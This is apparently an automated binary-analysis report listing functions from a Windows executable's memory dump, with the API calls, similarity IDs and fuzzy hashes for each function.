Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
String ID: crts
API String ID: 586820018-3724388283
Opcode ID: ab113a9b3d60f73e2364bd7cb43ad0b078bb347605c29c4b9a3077ebc24e9c1b
Instruction ID: 7df2c47b8578721bd849dc9f78a26322e34a58c851b413e65647b94d4c7db509
Opcode Fuzzy Hash: ab113a9b3d60f73e2364bd7cb43ad0b078bb347605c29c4b9a3077ebc24e9c1b
Instruction Fuzzy Hash: 554180B5200209DBDB10CF19D880A9AB7B5FF9C314F24C22AEE49CB355D731E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0087B415, Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0087B433

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0087B466
EnterCriticalSection.KERNEL32(?), ref: 0087B483
_memmove.LIBCMT ref: 0087B4E1
_memmove.LIBCMT ref: 0087B504
LeaveCriticalSection.KERNEL32(?), ref: 0087B513
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0087B52F
InterlockedExchange.KERNEL32(?,000001F6), ref: 0087B544

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
String ID:
API String ID: 2737351978-0
Opcode ID: f014815f3c4e87cf744077d173b93a01da5ae0a53e0ed5ddfac0dd505b17a2ac
Instruction ID: acef252a48c2f48ca0ecb15037b299f69146ba47eb9762607f6f2c295229cb51
Opcode Fuzzy Hash: f014815f3c4e87cf744077d173b93a01da5ae0a53e0ed5ddfac0dd505b17a2ac
Instruction Fuzzy Hash: A1418771A00609EFDB20DF98D845EAFB7B8FF48700F008A29F95A96650D770FA44DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00845134, Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0084515A
__calloc_crt.LIBCMT ref: 00845166
__getptd.LIBCMT ref: 00845173
CreateThread.KERNEL32 ref: 0084519A
ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 008451AA
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 008451B5
_free.LIBCMT ref: 008451BE
__dosmaperr.LIBCMT ref: 008451C9

Part of subcall function 00847E9A: __getptd_noexit.LIBCMT ref: 00847E9A

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 3638380555-0
Opcode ID: 9e6974bd47ccb9fc446aa3aa14d9109e2e04e82bc35af0d62509536f90ecf9bf
Instruction ID: e92f89dd00f49f3b0f1c7378bf2fca72cabb13c88a3f3685ef52ec5d17542a2e
Opcode Fuzzy Hash: 9e6974bd47ccb9fc446aa3aa14d9109e2e04e82bc35af0d62509536f90ecf9bf
Instruction Fuzzy Hash: BC11E532105B0D6BD7212BB89C45B5F7B98FF81B74F210719F925D62D3DBB598008662

Uniqueness

Uniqueness Score: -1.00%

Function 008950C6, Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00895196

Part of subcall function 0088875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,00896CC2,?,008A3B72,008A3B72,?), ref: 0088877B

inet_addr.WSOCK32(?,00000000,?,?), ref: 008951D8
gethostbyname.WSOCK32(?), ref: 008951E3
GlobalAlloc.KERNEL32(00000040,00000040), ref: 00895259
_memmove.LIBCMT ref: 00895307
GlobalFree.KERNEL32 ref: 00895399
WSACleanup.WSOCK32 ref: 0089539F

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
String ID:
API String ID: 2945290962-0
Opcode ID: 33da3d25b81d21cfab204bd67b46032bbd8aae376a6a389ff758670a63754259
Instruction ID: eb02939c6bff1fe988307602f5a33d73e62ce24c35eef6d85376cd18bb5b4703
Opcode Fuzzy Hash: 33da3d25b81d21cfab204bd67b46032bbd8aae376a6a389ff758670a63754259
Instruction Fuzzy Hash: 84A16C72604300AFD710EF68C886F6BB7E9FF89740F184A19F645D7281DB71E9058BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0087045D, Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0087049C
MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008706D8
SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 008706F7
InvalidateRect.USER32(?,00000000,00000001), ref: 0087071A
SendMessageW.USER32(?,00000469,?,00000000), ref: 0087074F
ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 00870772
DefDlgProcW.USER32(?,00000005,?,?), ref: 0087078C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
String ID:
API String ID: 1457242333-0
Opcode ID: 13d183a97e199ee1e473857013ba9f1d1883ede74b6d826a058dcce696a94689
Instruction ID: 7192750ca0cdbeadb1314f6865b3c61f914226a21c567d62963ae34e18070561
Opcode Fuzzy Hash: 13d183a97e199ee1e473857013ba9f1d1883ede74b6d826a058dcce696a94689
Instruction Fuzzy Hash: F0B1667060060AEFDB14CF68C984BAEBBB1FF98315F148519E999D7289D734EA50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00877273, Relevance: 10.7, APIs: 7, Instructions: 210COMMON

Download Yara Rule

APIs

Part of subcall function 008770BF: DeleteObject.GDI32(00000000), ref: 008770FC
Part of subcall function 008770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0087713C
Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087714C
Part of subcall function 008770BF: BeginPath.GDI32(?), ref: 00877161
Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087718A

Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 008773E8
MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 008773F8
AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 00877433
LineTo.GDI32(?,?,FFFFFFFE), ref: 0087743C
CloseFigure.GDI32(?), ref: 00877443
SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 00877452
Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0087746E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
String ID:
API String ID: 4082120231-0
Opcode ID: 2328295fab8b0780727e7e4ca720d085aa5e8a6aaa4ea238c9fbc02d0fa94ede
Instruction ID: 294879ca439f1ac84e5fbddb890ccc24de1db425e4a173caca18473f39cdb0b4
Opcode Fuzzy Hash: 2328295fab8b0780727e7e4ca720d085aa5e8a6aaa4ea238c9fbc02d0fa94ede
Instruction Fuzzy Hash: 59715CB4904509EFDB04CF98C884EBEBBB9FF89314F248259E915A7345C730AE41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0089A3F6, Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089A51C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0089A548
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0089A573
RegEnumValueW.ADVAPI32 ref: 0089A5A6
RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0089A5CF
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0089A608
RegCloseKey.ADVAPI32(?), ref: 0089A613

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
String ID:
API String ID: 2027346449-0
Opcode ID: f6198eb064aeaea184b6f3e5346f1cab7e7c6d161728049e0d25caeb92d00223
Instruction ID: 11fc9d51ac14493251bba568cdfa3fa7aa3a80597ca0f6772d659bd69c0386a9
Opcode Fuzzy Hash: f6198eb064aeaea184b6f3e5346f1cab7e7c6d161728049e0d25caeb92d00223
Instruction Fuzzy Hash: 95610671618301ABD704EB68C881E6BB7A9FFC8714F048A1DF685D7281DB75E905CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0089C3A9, Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0089C54C
WSAGetLastError.WSOCK32(00000000), ref: 0089C55D

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: b5eecc18c4cf0f633f8d7b051b4efde4af24c1f6cf292c1a19c7748e9715aea8
Instruction ID: 641c607019227da000143a42c9d85765bee41de499ebd468ceee94e91285927a
Opcode Fuzzy Hash: b5eecc18c4cf0f633f8d7b051b4efde4af24c1f6cf292c1a19c7748e9715aea8
Instruction Fuzzy Hash: 5C51FC72A00104ABDB10FF6CDC85FAE77A8FB84710F148259F915D7281DA31ED00C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 008744D9, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00874518
GetKeyboardState.USER32(?), ref: 0087452D
SetKeyboardState.USER32(?), ref: 00874581
PostMessageW.USER32 ref: 008745AE
PostMessageW.USER32 ref: 008745CC
PostMessageW.USER32 ref: 00874615
PostMessageW.USER32 ref: 00874637

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8deb7f449636704731b3dca89416fbe518ae936d15ed36b50ead26850f28cd96
Instruction ID: a67027cf371b4056730ca0570143085e36118eb03b12177dcfa891bcaa6294c0
Opcode Fuzzy Hash: 8deb7f449636704731b3dca89416fbe518ae936d15ed36b50ead26850f28cd96
Instruction Fuzzy Hash: C85103A05087D53AF73693788C45BB6BFA8BF06700F08D689F1D9964C7D3A4E884D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 008852F4, Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001308,?,00000000), ref: 00885314
ImageList_Remove.COMCTL32(?,?), ref: 00885348
SendMessageW.USER32(?,0000133D,?,00000002), ref: 00885430
DeleteObject.GDI32(?), ref: 008856AB
DeleteObject.GDI32(?), ref: 008856B9
DestroyIcon.USER32(?), ref: 008856C7
DestroyWindow.USER32(?), ref: 008856D5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
String ID:
API String ID: 2354583917-0
Opcode ID: 26d18110e9b09f60b2ddc268868a2975f4dd3003f24dd1241d3c6c3a41cbce29
Instruction ID: 776350e49fa1494707016eab1064b6638ad2c021db08ea09d79f10838253f5d7
Opcode Fuzzy Hash: 26d18110e9b09f60b2ddc268868a2975f4dd3003f24dd1241d3c6c3a41cbce29
Instruction Fuzzy Hash: C451AF74204A429FC724EF28C494FA6B7E5FF89311F448699F999CB3A1DB30E845CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008854A6, Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON

Download Yara Rule

APIs

ImageList_Destroy.COMCTL32(?), ref: 008854AE
ImageList_Destroy.COMCTL32(?), ref: 008854BC
DestroyWindow.USER32(?), ref: 0088569D
DeleteObject.GDI32(?), ref: 008856AB
DeleteObject.GDI32(?), ref: 008856B9
DestroyIcon.USER32(?), ref: 008856C7
DestroyWindow.USER32(?), ref: 008856D5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$DeleteImageList_ObjectWindow$Icon
String ID:
API String ID: 3985565216-0
Opcode ID: 5d0298fe20a858e490c787843b47af1d205d667dca08d51ddaed33afbe8ff164
Instruction ID: a8ec6eceabf88f968fbc0771a6a33e8ef58974205555b1a43bf359b9dc6dffcf
Opcode Fuzzy Hash: 5d0298fe20a858e490c787843b47af1d205d667dca08d51ddaed33afbe8ff164
Instruction Fuzzy Hash: 8D213B70304A01DFCB20EF28D9C8A2A77A9FF54311F508A58E946CB295DB31EC42CF61

Uniqueness

Uniqueness Score: -1.00%

Function 008601F8, Relevance: 9.3, APIs: 6, Instructions: 255COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00860253
GetWindowRect.USER32 ref: 00860283
GetClientRect.USER32 ref: 008602D1
GetSystemMetrics.USER32 ref: 0086031E
GetWindowRect.USER32 ref: 00860330
ScreenToClient.USER32 ref: 00860359

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Client$Window$MetricsScreenSystem
String ID:
API String ID: 3220332590-0
Opcode ID: 03caf8e9d787cc6f9be3056dd039a14cc7ce64fd5829c718f6fe19e9c4a1d68d
Instruction ID: f0229035fb50492e0d8f2bc216ef3175889b4840f0835cf3ffb42e1ab8196c54
Opcode Fuzzy Hash: 03caf8e9d787cc6f9be3056dd039a14cc7ce64fd5829c718f6fe19e9c4a1d68d
Instruction Fuzzy Hash: A5A15975A0070A9BCB20CFA8C5847EFB7B1FF58314F118519E9AAE7350EB30A954CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0087F149, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087CF87
_strncmp.LIBCMT ref: 0087F9B9

Strings

>, xrefs: 0087F04E
U, xrefs: 0087FAFE
\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove_strncmp
String ID: >$U$\
API String ID: 2666721431-237099441
Opcode ID: 03fd6f44349e9715b2db13f58e2abe2e0300c67ee13ec228ecb03842bd9ec301
Instruction ID: bb2cb6c74eb11c0a1442f6a6f708c5d861e9072316e45918ce253ded6c117743
Opcode Fuzzy Hash: 03fd6f44349e9715b2db13f58e2abe2e0300c67ee13ec228ecb03842bd9ec301
Instruction Fuzzy Hash: A2F17D70A002498FCB25CF69C8906AEBBF2FF89314F24856ED95AD7349D770E941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0087C48A, Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0087C4E6
SetKeyboardState.USER32(00000080), ref: 0087C50A
PostMessageW.USER32 ref: 0087C54B
PostMessageW.USER32 ref: 0087C583
PostMessageW.USER32 ref: 0087C5A5
SendInput.USER32(00000001,?,0000001C), ref: 0087C638

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$InputSend
String ID:
API String ID: 2221674350-0
Opcode ID: 989223f3334714e8d48655db23fb7d53c9a9e1e37a3c6db9afe6e74ad9436cd6
Instruction ID: 660079338d7c442be308bad88b021ba2399dbada4391761f39863f98f757b14f
Opcode Fuzzy Hash: 989223f3334714e8d48655db23fb7d53c9a9e1e37a3c6db9afe6e74ad9436cd6
Instruction Fuzzy Hash: 865108B250011866DB10AFA89C85FFE7B68FB9A710F00825AFD98D7146C375D951C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0088558B, Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0088560A
DestroyWindow.USER32(?), ref: 0088569D
DeleteObject.GDI32(?), ref: 008856AB
DeleteObject.GDI32(?), ref: 008856B9
DestroyIcon.USER32(?), ref: 008856C7
DestroyWindow.USER32(?), ref: 008856D5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyWindow$DeleteObject$IconMove
String ID:
API String ID: 1640429340-0
Opcode ID: 8432e0463680e6ff642df647f7d6828d3d28ac31d8ec2f8b0486223a1b4a851d
Instruction ID: 420344f8131f20c0e9ece4071fad2efc2f5b189e9fb6ab97d97f504940dbbe51
Opcode Fuzzy Hash: 8432e0463680e6ff642df647f7d6828d3d28ac31d8ec2f8b0486223a1b4a851d
Instruction Fuzzy Hash: 30312674204A01DFCB14EF28C8C8B2673E9FF58311F548AA9E945CB265EB34EC81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008850DD, Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON

Download Yara Rule

APIs

DestroyMenu.USER32(?), ref: 00885149
DestroyMenu.USER32(?), ref: 0088515F
DeleteObject.GDI32(?), ref: 008856AB
DeleteObject.GDI32(?), ref: 008856B9
DestroyIcon.USER32(?), ref: 008856C7
DestroyWindow.USER32(?), ref: 008856D5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$DeleteMenuObject$IconWindow
String ID:
API String ID: 752480666-0
Opcode ID: 95d4f63a789b5539f094ca56b05cb78e6258c4da05a69396efff56bfbfe25648
Instruction ID: f8af3a0d1dff8aef2ea6587f2ddbe63bb4240cc389a3d08d58836a1f9aadb1d7
Opcode Fuzzy Hash: 95d4f63a789b5539f094ca56b05cb78e6258c4da05a69396efff56bfbfe25648
Instruction Fuzzy Hash: 03218E74204B019FCB24EF28D9D8B6673AAFF44310F548658E94ACB255DB34EC85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0088526F, Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 008852D7
ImageList_Destroy.COMCTL32(?), ref: 008852E9
DeleteObject.GDI32(?), ref: 008856AB
DeleteObject.GDI32(?), ref: 008856B9
DestroyIcon.USER32(?), ref: 008856C7
DestroyWindow.USER32(?), ref: 008856D5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$DeleteObjectWindow$IconImageList_
String ID:
API String ID: 3275902921-0
Opcode ID: 51723a3d1507f6fc0e0a2db618a3d6d9a3fd3ab67940d1017fc79dda137ecb48
Instruction ID: 2fb3c68214012b2572866230f7ce5804c4b5e536d3051e1a9fb602e80277b99f
Opcode Fuzzy Hash: 51723a3d1507f6fc0e0a2db618a3d6d9a3fd3ab67940d1017fc79dda137ecb48
Instruction Fuzzy Hash: CE217870604A01AFCB14EF78D888A56B7A8FF59320F148A68F959C7291DB30E841CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00863187, Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,008D8178), ref: 0086319E
